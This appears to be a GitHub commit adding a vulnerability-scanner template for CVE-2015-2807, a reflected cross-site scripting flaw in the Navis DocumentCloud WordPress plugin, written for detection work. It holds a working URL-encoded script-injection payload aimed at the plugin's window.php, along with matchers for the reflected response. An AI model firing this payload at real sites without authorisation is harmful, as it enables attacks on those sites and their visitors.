Create CVE-2015-2807.yaml

patch-1
Muhammad Daffa 2021-08-04 00:09:09 +07:00 committed by GitHub
parent 5965a3e44c
commit 1d888e8b4e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2015-2807
info:
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%22%3Ealert(%22xss%22)%3C/script%3E%3Cscript%20src=%22"
matchers-condition: and
matchers:
- type: word
words:
- '">alert("xss")</script><script src="'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200